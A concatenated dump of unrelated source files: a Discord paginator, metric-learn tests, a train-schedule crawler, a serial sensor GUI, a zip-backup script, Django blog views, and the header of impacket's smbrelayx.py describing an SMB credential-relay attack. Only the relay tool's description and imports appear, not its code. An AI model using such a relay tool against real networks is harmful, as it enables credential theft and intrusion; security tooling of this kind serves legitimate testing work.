            to_delete.append(await self.channel.send('Took too long.'))
            await asyncio.sleep(5)
        else:
            page = int(msg.content)
            to_delete.append(msg)
            if page != 0 and page <= self.maximum_pages:
                await self.show_page(page)
            else:
                to_delete.append(await self.channel.send(f'Invalid page given. ({page}/{self.maximum_pages})'))
                await asyncio.sleep(5)
        # Clean up the prompt/answer messages; ignore missing permissions.
        try:
            await self.channel.delete_messages(to_delete)
        except Exception:
            pass
    async def show_help(self):
        """shows this message"""
        messages = ['Welcome to the interactive paginator!\n']
        messages.append('This interactively allows you to see pages of text by navigating with ' \
                        'reactions. They are as follows:\n')
        for (emoji, func) in self.reaction_emojis:
            messages.append(f'{emoji} {func.__doc__}')
        embed = self.embed.copy()
        embed.clear_fields()
        embed.description = '\n'.join(messages)
        embed.set_footer(text=f'We were on page {self.current_page} before this message.')
        await self.message.edit(content=None, embed=embed)
        # Automatically return to the page we were on after a minute.
        async def go_back_to_current_page():
            await asyncio.sleep(60.0)
            await self.show_current_page()
        self.bot.loop.create_task(go_back_to_current_page())
    async def stop_pages(self):
        """stops the interactive pagination session"""
        await self.message.delete()
        self.paginating = False
    def react_check(self, reaction, user):
        # True (and remember the matching handler in self.match) when the
        # reaction is one of ours, added by the invoker on our message.
        if user is None or user.id != self.author.id:
            return False
        if reaction.message.id != self.message.id:
            return False
        for (emoji, func) in self.reaction_emojis:
            if str(reaction.emoji) == str(emoji) or reaction.emoji == emoji:
                self.match = func
                return True
        return False
    async def paginate(self):
        """Actually paginate the entries and run the interactive loop if necessary."""
        first_page = self.show_page(1, first=True)
        if not self.paginating:
            await first_page
        else:
            # allow us to react to reactions right away if we're paginating
            self.bot.loop.create_task(first_page)
        while self.paginating:
            try:
                reaction, user = await self.bot.wait_for('reaction_add', check=self.react_check, timeout=120.0)
            except asyncio.TimeoutError:
                self.paginating = False
                try:
                    await self.message.clear_reactions()
                except:
                    pass
                finally:
                    break
            try:
                await self.message.remove_reaction(reaction, user)
            except:
                pass # can't remove it so don't bother doing so
            await self.match()
class FieldPages(Pages):
    """Paginator variant whose entries are (key, value) tuples rendered
    as embed fields instead of description lines.
    """
    def prepare_embed(self, entries, page, *, first=False):
        embed = self.embed
        embed.clear_fields()
        embed.description = discord.Embed.Empty
        for name, value in entries:
            embed.add_field(name=name, value=value, inline=False)
        # Only multi-page sessions get a footer.
        if self.maximum_pages <= 1:
            return
        if self.show_entry_count:
            footer = f'Page {page}/{self.maximum_pages} ({len(self.entries)} entries)'
        else:
            footer = f'Page {page}/{self.maximum_pages}'
        embed.set_footer(text=footer)
class TextPages(Pages):
    """Paginate a block of raw text using a commands.Paginator, one chunk per page."""
    def __init__(self, ctx, text, *, prefix='```', suffix='```', max_size=2000):
        # Reserve headroom below max_size for the "Page x/y" footer line.
        chunker = CommandPaginator(prefix=prefix, suffix=suffix, max_size=max_size - 200)
        for raw_line in text.split('\n'):
            chunker.add_line(raw_line)
        super().__init__(ctx, entries=chunker.pages, per_page=1, show_entry_count=False)
    def get_page(self, page):
        # One pre-built text chunk per 1-indexed page.
        return self.entries[page - 1]
    def get_embed(self, entries, page, *, first=False):
        # Text pages are sent as plain message content, never as an embed.
        return None
    def get_content(self, entry, page, *, first=False):
        if self.maximum_pages <= 1:
            return entry
        return f'{entry}\nPage {page}/{self.maximum_pages}'
class UrbanDictionaryPages(Pages):
    """Paginator for Urban Dictionary results; renders each definition into
    the embed description.
    """
    def __init__(self, ctx, *, entries, **kwargs):
        super().__init__(ctx, entries=entries, **kwargs)
        self.embed = CustomEmbeds.info(author="Urban Dictionary")
    def prepare_embed(self, entries, page, *, first=False):
        self.embed.clear_fields()
        self.embed.description = discord.Embed.Empty
        chunks = []
        for definition in entries:
            # Urban Dictionary wraps cross-references in [brackets]; strip them.
            body = definition.get('definition').replace("[", "").replace("]", "")
            sample = definition.get('example').replace("[", "").replace("]", "")
            chunks.append(
                f"Word: {definition.get('word')}\n"
                f"**Description**\n"
                f"{body}\n"
                f"**Example**\n"
                f"{sample}\n\n"
                f"[Link]({definition.get('permalink')}) | Author: {definition.get('author')}"
            )
        if self.maximum_pages > 1:
            if self.show_entry_count:
                footer = f'Page {page}/{self.maximum_pages} ({len(self.entries)} entries)'
            else:
                footer = f'Page {page}/{self.maximum_pages}'
            self.embed.set_footer(text=footer)
        self.embed.description = ''.join(chunks)
| [
"35881002+davisschenk@users.noreply.github.com"
] | 35881002+davisschenk@users.noreply.github.com |
c7c1e7bf9869fee16a3ec40957e9ff0cd0d56ddd | 34b4c572fe47e36878d9866ce0335f6f9e01c8e9 | /test/test_mahalanobis_mixin.py | 0d834f10915c65c946683f6f070c4172cf084ee9 | [
"MIT"
] | permissive | raijinspecial/metric-learn | 1bc7511b94ae3f4fef43d8de8ab2e95e061bd2d8 | 8ffd998971b70ba9b4f1b06ae9b9ef47d4c27f45 | refs/heads/master | 2020-04-17T20:40:42.593589 | 2019-01-07T18:34:06 | 2019-01-07T18:34:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,627 | py | from itertools import product
import pytest
import numpy as np
from numpy.testing import assert_array_almost_equal
from scipy.spatial.distance import pdist, squareform
from sklearn import clone
from sklearn.utils import check_random_state
from sklearn.utils.testing import set_random_state
from metric_learn._util import make_context
from test.test_utils import ids_metric_learners, metric_learners
RNG = check_random_state(0)
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
                         ids=ids_metric_learners)
def test_score_pairs_pairwise(estimator, build_dataset):
  """score_pairs over the full cartesian product must form a distance matrix."""
  # Computing pairwise scores should return a euclidean distance matrix.
  input_data, labels, _, X = build_dataset()
  n_samples = 20
  X = X[:n_samples]
  model = clone(estimator)
  set_random_state(model)
  model.fit(input_data, labels)
  # Score every (x_i, x_j) pair and reshape into an n x n matrix.
  pairwise = model.score_pairs(np.array(list(product(X, X))))\
      .reshape(n_samples, n_samples)
  check_is_distance_matrix(pairwise)
  # a necessary condition for euclidean distance matrices: (see
  # https://en.wikipedia.org/wiki/Euclidean_distance_matrix)
  assert np.linalg.matrix_rank(pairwise**2) <= min(X.shape) + 2
  # assert that this distance is coherent with pdist on embeddings
  assert_array_almost_equal(squareform(pairwise), pdist(model.transform(X)))
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
                         ids=ids_metric_learners)
def test_score_pairs_toy_example(estimator, build_dataset):
  """score_pairs must equal the euclidean distance between embedded points."""
  input_data, labels, _, X = build_dataset()
  X = X[:20]
  learner = clone(estimator)
  set_random_state(learner)
  learner.fit(input_data, labels)
  # Pair up the first ten points with the next ten.
  pairs = np.stack([X[:10], X[10:20]], axis=1)
  embedded = pairs.dot(learner.transformer_.T)
  diffs = embedded[:, 1] - embedded[:, 0]
  expected = np.sqrt((diffs ** 2).sum(axis=-1))
  assert_array_almost_equal(learner.score_pairs(pairs), expected)
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
                         ids=ids_metric_learners)
def test_score_pairs_finite(estimator, build_dataset):
  """Every pairwise score produced by a fitted learner must be finite."""
  input_data, labels, _, X = build_dataset()
  learner = clone(estimator)
  set_random_state(learner)
  learner.fit(input_data, labels)
  all_pairs = np.array(list(product(X, X)))
  scores = learner.score_pairs(all_pairs)
  assert np.isfinite(scores).all()
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
                         ids=ids_metric_learners)
def test_score_pairs_dim(estimator, build_dataset):
  # scoring of 3D arrays should return 1D array (several tuples),
  # and scoring of 2D arrays (one tuple) should return an error (like
  # scikit-learn's error when scoring 1D arrays)
  input_data, labels, _, X = build_dataset()
  model = clone(estimator)
  set_random_state(model)
  model.fit(input_data, labels)
  tuples = np.array(list(product(X, X)))
  # One score per tuple: shape (n_tuples,).
  assert model.score_pairs(tuples).shape == (tuples.shape[0],)
  context = make_context(estimator)
  # The exact error message the estimator is expected to raise for 2D input.
  msg = ("3D array of formed tuples expected{}. Found 2D array "
         "instead:\ninput={}. Reshape your data and/or use a preprocessor.\n"
         .format(context, tuples[1]))
  with pytest.raises(ValueError) as raised_error:
    model.score_pairs(tuples[1])
  assert str(raised_error.value) == msg
def check_is_distance_matrix(pairwise):
  """Assert that *pairwise* satisfies the axioms of a distance matrix."""
  # Non-negativity.
  assert np.all(pairwise >= 0)
  # Symmetry: d(i, j) == d(j, i).
  assert np.array_equal(pairwise, pairwise.T)
  # Identity: zero diagonal.
  assert np.all(pairwise.diagonal() == 0)
  # Triangle inequality, with a small tolerance for float round-off.
  tol = 1e-15
  triangle = pairwise[:, :, np.newaxis] + pairwise[:, np.newaxis, :] + tol
  assert np.all(pairwise <= triangle)
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
                         ids=ids_metric_learners)
def test_embed_toy_example(estimator, build_dataset):
  """transform(X) must equal X @ transformer_.T on a small sample."""
  input_data, labels, _, X = build_dataset()
  X = X[:20]
  learner = clone(estimator)
  set_random_state(learner)
  learner.fit(input_data, labels)
  expected = X.dot(learner.transformer_.T)
  assert_array_almost_equal(learner.transform(X), expected)
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
                         ids=ids_metric_learners)
def test_embed_dim(estimator, build_dataset):
  # Checks that the dimension of the output space is as expected
  input_data, labels, _, X = build_dataset()
  model = clone(estimator)
  set_random_state(model)
  model.fit(input_data, labels)
  # Without dimensionality reduction the embedding keeps the input shape.
  assert model.transform(X).shape == X.shape
  # assert that ValueError is thrown if input shape is 1D
  context = make_context(estimator)
  err_msg = ("2D array of formed points expected{}. Found 1D array "
             "instead:\ninput={}. Reshape your data and/or use a "
             "preprocessor.\n".format(context, X[0]))
  with pytest.raises(ValueError) as raised_error:
    model.score_pairs(model.transform(X[0, :]))
  assert str(raised_error.value) == err_msg
  # we test that the shape is also OK when doing dimensionality reduction
  if type(model).__name__ in {'LFDA', 'MLKR', 'NCA', 'RCA'}:
    model.set_params(num_dims=2)
    model.fit(input_data, labels)
    assert model.transform(X).shape == (X.shape[0], 2)
    # assert that ValueError is thrown if input shape is 1D
    with pytest.raises(ValueError) as raised_error:
      model.transform(model.transform(X[0, :]))
    assert str(raised_error.value) == err_msg
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
                         ids=ids_metric_learners)
def test_embed_finite(estimator, build_dataset):
  """All embedded coordinates produced by a fitted learner must be finite."""
  input_data, labels, _, X = build_dataset()
  learner = clone(estimator)
  set_random_state(learner)
  learner.fit(input_data, labels)
  embedded = learner.transform(X)
  assert np.isfinite(embedded).all()
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
                         ids=ids_metric_learners)
def test_embed_is_linear(estimator, build_dataset):
  """The learned embedding must be linear: additive and homogeneous."""
  input_data, labels, _, X = build_dataset()
  learner = clone(estimator)
  set_random_state(learner)
  learner.fit(input_data, labels)
  a, b = X[:10], X[10:20]
  # Additivity: T(a + b) == T(a) + T(b).
  assert_array_almost_equal(learner.transform(a + b),
                            learner.transform(a) + learner.transform(b))
  # Homogeneity: T(5a) == 5 T(a).
  assert_array_almost_equal(learner.transform(5 * a),
                            5 * learner.transform(a))
"bellet@users.noreply.github.com"
] | bellet@users.noreply.github.com |
7b42a2c6fe549de4ee270432a55bc805f6b33c8c | 6bbd5996efd7f3e4b96c6158bea5552331a06741 | /train_crawler.py | f1a6f6b0eff92e0b5cbe211206047580529a4359 | [] | no_license | rainbowday/Train-Crawler | ef7365577f9bfc4ee816484abaf2dd7ce712fb58 | 2d4b8efb4c937a3ffc7bef20e4ae092875a0529a | refs/heads/master | 2020-07-04T11:16:00.983215 | 2018-07-01T14:51:08 | 2018-07-01T14:51:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,866 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/6/29 0029 18:08
# @Author : KangQiang
# @File : Crawler.py
# @Software: PyCharm
import json
import threading
import time
from queue import Queue
from config import UN_PROCESSED, PROCESSING, PROCESSED, logger, train_tasks_status_db, train_result_filename, format_url,ip_interval
from pymongo import UpdateOne
from get_page import get_page,get_count
# url_paras waiting to be crawled (filled by TaskProducer, drained by Crawler).
task_queue = Queue()
# (parsed_data, url_paras) tuples waiting to be persisted (drained by DataSaver3).
response_queue = Queue()
def parse(html_response):
    """Extract the useful train rows from a query response body.

    Returns a list with one 10-element list per train covering the whole
    origin-to-destination run, e.g.
    [['5l0000D35273', 'D352', 'AOH', 'ICW', 'AOH', 'ICW', '06:11', '20:27', '14:16', 'Y'], ...].
    Returns None (after logging) if a result row cannot be parsed.
    """
    schedules = []
    payload = json.loads(html_response)["data"]
    result = payload["result"]
    try:
        for row in result:
            # Drop everything up to the first '|', then keep fields 1..10.
            fields = row[row.index("|") + 1:].split("|")
            schedules.append(fields[1:11])
    except Exception as e:
        logger.critical(str(e) + str(result))
        return None
    return schedules
def construct_url(url_paras):
    """Build the query URL for one task.

    :param url_paras: '-'-separated string "<from_station>-<to_station>".
    :return: the query URL. Note that config.format_url already embeds the
        train_date parameter (a date a few days after run time).
    """
    parts = url_paras.split("-")
    return format_url.format(from_station=parts[0], to_station=parts[1])
class Crawler(threading.Thread):
    """Worker thread: fetches task URLs and queues the parsed responses.

    Pulls url_paras from the global task_queue, downloads the page, parses
    it and pushes (data, url_paras) onto response_queue. On any failure the
    task's status is reset to UN_PROCESSED so it can be retried.
    """
    def __init__(self, task_status_db, parse_fun, construct_url_fun):
        """
        :param task_status_db: task-status collection recording crawl state,
            keyed by url_para (the primary key).
        :param parse_fun: callable that parses response.text into usable data.
        :param construct_url_fun: callable that builds the task URL from a
            task_queue item.
        """
        super(Crawler, self).__init__()
        self.collection = task_status_db
        self.parse = parse_fun
        self.construct_url = construct_url_fun
    def run(self):
        global task_queue
        global response_queue
        while True:
            url_paras = task_queue.get()
            task_url = self.construct_url(url_paras)
            try:
                # get_page wraps the raw requests call (retry/proxy handling).
                response = get_page(task_url)
                if response:
                    data = self.parse(response)
                    if data is not None:  # None means response.text failed to parse.
                        response_queue.put((data, url_paras))
                    else:
                        self.collection.update_one({'_id': url_paras}, update={'$set': {'status': UN_PROCESSED}})
                else:
                    # Reset the task's DB status back to UN_PROCESSED for retry.
                    self.collection.update_one({'_id': url_paras}, update={'$set': {'status': UN_PROCESSED}})
            except Exception as e:
                logger.critical('In Crawler:{}'.format(str(e)) + str(task_url))
                self.collection.update_one({'_id': url_paras}, update={'$set': {'status': UN_PROCESSED}})
                pass
class TaskProducer(threading.Thread):
    """Feeder thread: keeps task_queue topped up with UN_PROCESSED tasks.

    Whenever the queue drops below 300 items, it claims up to 60
    UN_PROCESSED tasks from the status DB (marking them PROCESSING)
    and enqueues their ids; otherwise it sleeps briefly.
    """
    def __init__(self, task_status_db):
        super(TaskProducer, self).__init__()
        self.collection = task_status_db
    def run(self):
        global task_queue
        while True:
            try:
                if task_queue.qsize() < 300:
                    temp = self.collection.find({'status': UN_PROCESSED}, limit=60)
                    for single_item in temp:
                        # Claim the task: mark it PROCESSING before queueing.
                        self.collection.update_one({'_id': single_item['_id']},
                                                   update={'$set': {'status': PROCESSING}})
                        task_queue.put(single_item['_id'])
                else:
                    time.sleep(3)
            except Exception as e:
                logger.critical('In Task1Producer:{}'.format(str(e)))
                pass
class DataSaver3(threading.Thread):
    """Consumer thread: drains response_queue and persists the parsed data."""
    def __init__(self, task_status_db, file_name):
        """
        :param task_status_db: DB recording task status; parsed data is also
            stored directly into it (save2db path).
        :param file_name: local file the data is appended to (save2file path).
        """
        super(DataSaver3, self).__init__()
        self.status_db = task_status_db  # holds both task status and the stored data
        self.file_name = file_name
    def save2db(self, size):
        """
        Flush up to *size* responses from response_queue into the status DB.
        :param size: number of responses to drain per batch
        :return: None
        """
        global response_queue
        ops = []  # bulk-write operations to execute against the DB
        try:
            for _ in range(size):
                data, url_paras = response_queue.get()  # one page's response
                ops.append(
                    UpdateOne({'_id': url_paras}, update={'$set': {'status': PROCESSED, 'data': data}}))
                # self.status_db.update_one({'_id': recordId}, {'$set': {'status': PROCESSED, 'data': data}})
            if ops:
                self.status_db.bulk_write(ops, ordered=False)
        except Exception as e:
            if 'batch op errors occurred' not in str(e):
                logger.error('In save2db:' + str(e))
            pass
    def save2file(self, size):
        """
        Drain *size* responses from the queue and append them to the local file.
        :param size: number of responses to drain per batch
        :return: None
        """
        global response_queue
        with open(self.file_name, 'a', encoding="utf-8") as f:
            for _ in range(size):
                try:
                    data, url_para = response_queue.get()
                    self.status_db.find_one_and_update({'_id': url_para},
                                                       {'$set': {'status': PROCESSED}})  # mark this id PROCESSED
                    f.write(json.dumps({"_id": url_para, "data": data}) + '\n')
                except Exception as e:
                    logger.error('In save2file:' + str(e))
                    pass
    def run(self):
        while True:
            self.save2db(30)
            # self.save2file(200)
class Supervisor(threading.Thread):
    """Monitor thread: every 10s logs crawl speed, queue size and task counts."""
    def __init__(self, tasks_status_db):
        super(Supervisor, self).__init__()
        self.tasks_status_db = tasks_status_db
    def run(self):
        global response_queue
        while True:
            pre_count = get_count()
            time.sleep(10)
            now_count = get_count()
            # speed = pages fetched per second over the 10-second window.
            logger.info('page_count:{now_count} speed:{speed} response_queue.qsize():{size}'.format(now_count=now_count,
                                                                                                    speed=(
                                                                                                          now_count - pre_count) / 10,
                                                                                                    size=response_queue.qsize()))
            print("PROCESSED: " + str(self.tasks_status_db.find({"status": PROCESSED}).count()))
            print("PROCESSING: " + str(self.tasks_status_db.find({"status": PROCESSING}).count()))
            print("UN_PROCESSED: " + str(self.tasks_status_db.find({"status": UN_PROCESSED}).count()))
if __name__ == '__main__':
    # One producer keeps the task queue filled from the status DB.
    t = TaskProducer(train_tasks_status_db)
    t.start()
    # One saver drains parsed responses back into the DB.
    t = DataSaver3(train_tasks_status_db, train_result_filename)
    t.start()
    # Two crawler workers fetch and parse pages.
    for i in range(2):
        t = Crawler(train_tasks_status_db, parse, construct_url)
        t.start()
    # t = IpChanger()
    # t.start()
    # Supervisor periodically logs throughput and task-status counts.
    t = Supervisor(train_tasks_status_db)
    t.start()
| [
"tkanng@gmail.com"
] | tkanng@gmail.com |
aaa99663a9b9a7da2458aa4b46a53fef0d1a4366 | e6a81db4f217840a42bdf968b3b2972ed1ade4d2 | /hello.txrx.44.py | b33c8f8c72eb9c42f183e85376886a6761bbf19e | [] | no_license | Satyam/rotationsensor | e2e37201d920337863ce87708ea992bb705943b4 | 5056c5cc83c953c2b0e476f6c4f46e57e29f60ad | refs/heads/master | 2021-06-01T15:03:53.266583 | 2021-03-09T15:51:45 | 2021-03-09T15:51:45 | 19,355,877 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,615 | py | #
# hello.txrx.44.py
#
# receive and display transmit-receive step response
# hello.step.44.py serial_port
#
# Neil Gershenfeld
# CBA MIT 11/6/11
#
# (c) Massachusetts Institute of Technology 2011
# Permission granted for experimental and personal use;
# license for commercial sale available from MIT
#
from Tkinter import *
import serial
WINDOW = 600 # window size
eps = 0.75 # filter fraction
filt = 0.0 # filtered value
# NOTE(review): this module-level padnumber appears unused -- idle() assigns
# its own local padnumber from the serial stream; presumably leftover.
padnumber = 0
def idle(parent,canvas):
    global filt, eps
    #
    # idle routine: read one framed packet from the serial port, update the
    # low-pass filtered value, and redraw the bar for the reported pad
    #
    byte2 = 0
    byte3 = 0
    byte4 = 0
    ser.flush()
    #
    # find framing: wait for the 1,2,3,4 sync byte sequence
    #
    while 1:
        byte1 = byte2
        byte2 = byte3
        byte3 = byte4
        byte4 = ord(ser.read())
        if ((byte1 == 1) & (byte2 == 2) & (byte3 == 3) & (byte4 == 4)):
            break
    #
    # read and plot: pad index, then two little-endian 16-bit words
    # (up/down counts); their difference is the raw reading
    #
    padnumber = int(ord(ser.read())) - 1
    #print "-----------"
    #print "padnumber: %d"%padnumber
    up_low = ord(ser.read())
    #print "up_low: %d"%up_low
    up_high = ord(ser.read())
    #print "up_high: %d"%up_high
    down_low = ord(ser.read())
    #print "down_low: %d"%down_low
    down_high = ord(ser.read())
    #print "down_high: %d"%down_high
    up_value = 256*up_high + up_low
    down_value = 256*down_high + down_low
    value = (up_value - down_value)
    # exponential moving average with fraction eps
    filt = (1-eps)*filt + eps*value
    # map the filtered value onto the bar's x extent (.2..0.9 of the window)
    x = int(.2*WINDOW + (.9-.2)*WINDOW*filt/10000.0)
    print padnumber, value
    if(padnumber == 0):
        canvas.itemconfigure("pad1text",text="%.1f"%filt)
        canvas.coords('pad1fillrect',.2*WINDOW,.05*WINDOW+.25*WINDOW*padnumber,x,.2*WINDOW+.25*WINDOW*padnumber)
        canvas.coords('pad1emptyrect',x,.05*WINDOW+.25*WINDOW*padnumber,.9*WINDOW,.2*WINDOW+.25*WINDOW*padnumber)
    elif (padnumber == 1):
        canvas.itemconfigure("pad2text",text="%.1f"%filt)
        canvas.coords('pad2fillrect',.2*WINDOW,.05*WINDOW+.25*WINDOW*padnumber,x,.2*WINDOW+.25*WINDOW*padnumber)
        canvas.coords('pad2emptyrect',x,.05*WINDOW+.25*WINDOW*padnumber,.9*WINDOW,.2*WINDOW+.25*WINDOW*padnumber)
    elif (padnumber == 2):
        canvas.itemconfigure("pad3text",text="%.1f"%filt)
        canvas.coords('pad3fillrect',.2*WINDOW,.05*WINDOW+.25*WINDOW*padnumber,x,.2*WINDOW+.25*WINDOW*padnumber)
        canvas.coords('pad3emptyrect',x,.05*WINDOW+.25*WINDOW*padnumber,.9*WINDOW,.2*WINDOW+.25*WINDOW*padnumber)
    elif (padnumber == 3):
        canvas.itemconfigure("pad4text",text="%.1f"%filt)
        canvas.coords('pad4fillrect',.2*WINDOW,.05*WINDOW+.25*WINDOW*padnumber,x,.2*WINDOW+.25*WINDOW*padnumber)
        canvas.coords('pad4emptyrect',x,.05*WINDOW+.25*WINDOW*padnumber,.9*WINDOW,.2*WINDOW+.25*WINDOW*padnumber)
    canvas.update()
    # reschedule ourselves for the next packet
    parent.after_idle(idle,parent,canvas)
#
# check command line arguments
#
if (len(sys.argv) != 2):
    print "command line: hello.txrx.44.py serial_port"
    sys.exit()
port = sys.argv[1]
#
# open serial port at 115200 baud and assert DTR
#
ser = serial.Serial(port,115200)
ser.setDTR()
#
# set up GUI: one labelled horizontal bar per pad (four pads)
#
root = Tk()
root.title('hello.txrx.44.py (q to exit)')
# NOTE(review): bind() is given the string 'exit' rather than a callable --
# presumably 'q' does not actually quit; confirm intended behavior.
root.bind('q','exit')
canvas = Canvas(root, width=WINDOW, height=WINDOW, background='white')
#
canvas.create_text(.1*WINDOW,.125*WINDOW+.125*WINDOW*0,text="1",font=("Helvetica", 24),tags="pad1text",fill="black")
canvas.create_rectangle(.2*WINDOW,.05*WINDOW+.25*WINDOW*0,.3*WINDOW,.2*WINDOW+.25*WINDOW*0, tags='pad1fillrect', fill='red')
canvas.create_rectangle(.3*WINDOW,.05*WINDOW,.9*WINDOW,.2*WINDOW, tags='pad1emptyrect', fill='white')
canvas.create_text(.1*WINDOW,.125*WINDOW+.125*WINDOW*2*1,text="1",font=("Helvetica", 24),tags="pad2text",fill="black")
canvas.create_rectangle(.2*WINDOW,.05*WINDOW+.25*WINDOW*1,.3*WINDOW,.2*WINDOW+.25*WINDOW*1, tags='pad2fillrect', fill='yellow')
canvas.create_rectangle(.3*WINDOW,.05*WINDOW+.25*WINDOW*1,.9*WINDOW,.2*WINDOW+.25*WINDOW*1, tags='pad2emptyrect', fill='white')
canvas.create_text(.1*WINDOW,.125*WINDOW+.125*WINDOW*2*2,text="1",font=("Helvetica", 24),tags="pad3text",fill="black")
canvas.create_rectangle(.2*WINDOW,.05*WINDOW+.25*WINDOW*2,.3*WINDOW,.2*WINDOW+.25*WINDOW*2, tags='pad3fillrect', fill='grey')
canvas.create_rectangle(.3*WINDOW,.05*WINDOW+.25*WINDOW*2,.9*WINDOW,.2*WINDOW+.25*WINDOW*2, tags='pad3emptyrect', fill='white')
canvas.create_text(.1*WINDOW,.125*WINDOW+.125*WINDOW*2*3,text="1",font=("Helvetica", 24),tags="pad4text",fill="black")
canvas.create_rectangle(.2*WINDOW,.05*WINDOW+.25*WINDOW*3,.3*WINDOW,.2*WINDOW+.25*WINDOW*3, tags='pad4fillrect', fill='black')
canvas.create_rectangle(.3*WINDOW,.05*WINDOW+.25*WINDOW*3,.9*WINDOW,.2*WINDOW+.25*WINDOW*3, tags='pad4emptyrect', fill='white')
canvas.pack()
#
# start idle loop
#
root.after(100,idle,root,canvas)
root.mainloop()
| [
"satyam@satyam.com.ar"
] | satyam@satyam.com.ar |
e11205a6a6b5e106d13cbcda6cdc849cb0b70787 | a0e3f2840b2026a775ed0494b79938aa81567531 | /Programming Assignment 4/LaurenRobbenAssignment4 copy.py | 965edf08a7ba0a44126c8377e050cdb4c0c27b65 | [] | no_license | larobben13/Lauren-Robben-Portfolio | d944ec5dfb690f6ce25a929cccfbbb9c687c395d | ef6ea371c4cd3d4195998106cb0c758ade331f05 | refs/heads/main | 2023-07-27T16:56:32.903994 | 2021-09-16T22:41:22 | 2021-09-16T22:41:22 | 407,331,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,031 | py | #INF360 - Programming in Python
#Lauren Robben
#Assignment 4
import zipfile, os
def backupToZip(folder):
    """Back up the entire contents of *folder* into a numbered ZIP file.

    The archive is named '<folder>_<N>.zip' (created in the current working
    directory), where N is the first number for which no such file already
    exists, so repeated runs create fresh backups instead of overwriting.

    :param folder: path (relative or absolute) of the directory to back up.
    """
    folder = os.path.abspath(folder)  # make sure folder is absolute
    # Figure out the filename this code should use based on
    # what files already exist.
    number = 1
    while True:
        zipFilename = os.path.basename(folder) + '_' + str(number) + '.zip'
        if not os.path.exists(zipFilename):
            break
        number = number + 1
    # Create the ZIP file.
    # (Fixes the original, which referenced undefined names such as
    # zipLaurenRobbenAssignment4 / Assignment4 and duplicated this section.)
    print(f'Creating {zipFilename}...')
    backupZip = zipfile.ZipFile(zipFilename, 'w')
    # Walk the entire folder tree and compress the files in each folder.
    for foldername, subfolders, filenames in os.walk(folder):
        print(f'Adding files in {foldername}...')
        # Add the current folder to the ZIP file.
        backupZip.write(foldername)
        # Add all the files in this folder to the ZIP file.
        newBase = os.path.basename(folder) + '_'
        for filename in filenames:
            if filename.startswith(newBase) and filename.endswith('.zip'):
                continue  # don't back up the backup ZIP files
            backupZip.write(os.path.join(foldername, filename))
    backupZip.close()
    print('Done.')
#MadLibs Game
#Questions Go Here
# Collect the player's words before filling in the story below.
noun1 = input('Enter a noun:')
adj1 = input('Enter an adjective:')
adverb1 = input('Enter an adverb:')
verb1 = input('Enter a verb:')
noun2 = input('Enter another noun:')
adj2 = input('Enter another adjective:')
adverb2 = input('Enter another adverb:')
verb2 = input('Enter another verb:')
#MadLib prints out below
# NOTE(review): the visible story only uses adj1 and noun1; the remaining
# collected words (adverb1, verb1, noun2, ...) are unused here -- the rest
# of the story appears to be truncated. Also 'noun1 + "to swim"' is missing
# a space before "to".
print('There are many ' + adj1 + ' ways to choose a/an ' + noun1 + 'to swim.')
print(
| [
"noreply@github.com"
] | larobben13.noreply@github.com |
cedcaeb32f08859d744bbb1b09d963ff22ad58b7 | 25f9007e328a83238987be4651e2543ef052ef36 | /Blog/views.py | 399f278e87142aeaf0df64c999abf359590ebaae | [] | no_license | billd100/HexCollect | a7cf151887e345792fdf80e460728feaec6109ca | 7a3445ecbcb600a2853a437c2ced7b4eddc7816c | refs/heads/master | 2021-03-16T03:27:17.816425 | 2017-08-28T00:51:29 | 2017-08-28T00:51:29 | 91,523,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py | from django.shortcuts import render, get_object_or_404
from Blog.models import BlogPost
def blog(request):
    """Render the blog index with the three most recent posts."""
    latest = BlogPost.objects.order_by('-pub_date')[:3]
    return render(request, 'Blog/blog.html', {'recent_posts': latest})
def blog_post(request, slug=None):
    """Render a single blog post looked up by slug; 404 when not found."""
    # Renamed the local from `blog_post` to `post`: the original shadowed the
    # view function's own name inside its body.
    post = get_object_or_404(BlogPost, slug=slug)
    return render(request, 'Blog/blog_post.html', {'blog_post': post})
| [
"williamdavisi777@gmail.com"
] | williamdavisi777@gmail.com |
5397186e66c797d3884c21346086536eb6c49005 | 59d18dc2b539d46e32c07b3c5b5cbeb16beda4d1 | /impacket/examples/smbrelayx/smbrelayx.py | 0afcb5bf01206e48396e5437a701d2d69a08f473 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"Apache-1.1",
"BSD-2-Clause"
] | permissive | Aliced3645/DataCenterMarketing | 9cbb0e429a8053af180172f5da69cb37a99c49be | 67bc485e73cf538498a89b28465afb822717affb | refs/heads/master | 2016-08-04T22:23:23.952571 | 2013-05-07T02:50:47 | 2013-05-07T02:50:47 | 8,640,330 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,417 | py | #!/usr/bin/python
# Copyright (c) 2012 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# $Id: smbrelayx.py 607 2012-07-14 23:53:54Z bethus@gmail.com $
#
# SMB Relay Module
#
# Author:
# Alberto Solino
#
# Description:
# This module performs the SMB Relay attacks originally discovered by cDc. It receives a
# list of targets and for every connection received it will choose the next target and try to relay the
# credentials. Also, if specified, it will first to try authenticate against the client connecting to us.
#
# It is implemented by invoking the smbserver, hooking to a few functions and then using the smbclient
# portion. It is supposed to be working on any LM Compatibility level. The only way to stop this attack
# is to enforce on the server SPN checks and or signing.
#
# If the authentication against the targets succeed, the client authentication success as well and
# a valid connection is set against the local smbserver. It's up to the user to set up the local
# smbserver functionality. One option is to set up shares with whatever files you want to the victim
# thinks it's connected to a valid SMB server. All that is done through the smb.conf file.
#
import socket
import string
import sys
import types
import os
import random
import time
import argparse
from impacket import smbserver, smb, ntlm, dcerpc, version
from impacket.dcerpc import dcerpc, transport, srvsvc, svcctl
